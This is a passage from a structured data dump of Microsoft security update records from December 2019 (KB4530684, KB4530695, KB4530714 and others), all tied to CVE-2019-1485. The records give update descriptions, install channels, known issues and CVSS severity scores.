Windows Kernel, the Microsoft Scripting Engine, and Windows Server.\n\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\nKnown issues in this updateMicrosoft is not currently aware of any issues with this update.How to get this update**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For more information, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date>).If you are using Windows Update, the latest SSU (KB4524569) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530684>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4530684](<https://download.microsoft.com/download/0/d/d/0dd1fc0c-9121-48a7-85b0-10029f662a36/4530684.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530684 (OS Builds 18362.535 and 18363.535) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T08:00:00", "id": "KB4530684", "href": "https://support.microsoft.com/en-us/help/4530684", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:27:07", "description": "None\n**IMPORTANT** Customers who have [purchased](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) the Extended Security Update (ESU) for on-premises versions of some operating systems must follow specific procedures to continue receiving security updates after extended support ends on January 14, 2020. For more information, see KB4522133\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4525244(released November 19, 2019) and addresses the following issues:\n\n * Security updates to Windows Input and Composition, Windows Virtualization, Windows Kernel, the Microsoft Scripting Engine, and Windows Peripherals.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update****Prerequisite:**You must install the updates listed below and **_restart your device_** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) (KB4493730). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\n 2. The latest SHA-2 update (KB4474419) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. For more information on SHA-2 updates, see 2019 SHA-2 Code Signing Support requirement for Windows and WSUS.\nAfter installing the items above, Microsoft strongly recommends that you install the _latest _SSU (KB4531787). If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530695>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4530695](<https://download.microsoft.com/download/8/6/3/8638a33f-3179-4830-952b-55c56ebdee4c/4530695.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530695 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T08:00:00", "id": "KB4530695", "href": "https://support.microsoft.com/en-us/help/4530695", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:27:08", "description": "None\n**Reminder **March 12 and April 9 were the last two Delta updates for Windows 10, version 1709. Security and quality updates will continue to be available via the express and full cumulative update packages. For more information on this change please visit our [blog](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/Windows-10-quality-updates-explained-amp-the-end-of-delta/ba-p/214426>).\n\n**Reminder** Windows 10, version 1709, reached end of service on April 9, 2019 for devices running Windows 10 Home, Pro, Pro for Workstation, and IoT Core editions. These devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.\n\n**IMPORTANT **Windows 10 Enterprise, Education, and IoT Enterprise editions will continue to receive servicing at no cost per the lifecycle announcement on October 2018.\n\n**ePub support ended in Microsoft Edge**Microsoft Edge has ended support for e-books that use the .epub file extension. For more information, see [Download an ePub app to keep reading e-books](<https://support.microsoft.com/help/4517840>).\n\nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using external devices (such as game controllers and web cameras).\n * Updates an issue in which the Microsoft Store might fail to open on Windows on Arm.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which the Microsoft Store might fail to open on Windows on Arm.\n * Changes the default behavior in ASP.NET for the SameSite cookie header to align with changes other industry partners are making. For more information, see [Work with SameSite cookies in ASP.NET](<https://docs.microsoft.com/en-us/aspnet/samesite/system-web-samesite>).\n * Security updates to Windows Virtualization, Windows Kernel, Windows Peripherals, the Microsoft Scripting Engine, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nWhen setting up a new Windows device during the Out of Box Experience (OOBE), you might be unable to create a local user when using Input Method Editor (IME). This issue might affect you if you are using the IME for Chinese, Japanese, or Korean languages.**Note** This issue does not affect using a Microsoft Account during OOBE.| This issue is resolved in KB4534318. \nAfter installing this update, you might encounter issues with applications that use embedded HTML and SameSite cookies across sites or iframes.| To align with industry partners, the default behavior of the SameSite cookie header in ASP.NET has been changed. To mitigate this issue, see [Work with SameSite cookies in ASP.NET](<https://docs.microsoft.com/en-us/aspnet/samesite/system-web-samesite>). \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For more information, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates#why-should-servicing-stack-updates-be-installed-and-kept-up-to-date>).If you are using Windows Update, the latest SSU (KB4523202) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4530714>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4530714](<https://download.microsoft.com/download/e/b/f/ebf4e40b-83f6-4baf-8f50-c2ba0d6bdd51/4530714.csv>). \n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mskb", "title": "December 10, 2019\u2014KB4530714 (OS Build 16299.1565)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T08:00:00", "id": "KB4530714", "href": "https://support.microsoft.com/en-us/help/4530714", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:27:10", "description": "None\n**IMPORTANT **Verify that you have installed the required updates listed in the **How to get this update** section _before_ installing this update. \n\n**IMPORTANT** Customers who have [purchased](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) the Extended Security Update (ESU) for on-premises versions of some operating systems must follow specific procedures to continue receiving security updates after extended support ends on January 14, 2020. For more information, see KB4522133.\n\n**IMPORTANT** Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1:**Note **The notification will not appear on domain-joined machines or machines in kiosk mode.\n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. For more information, see[ How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of upda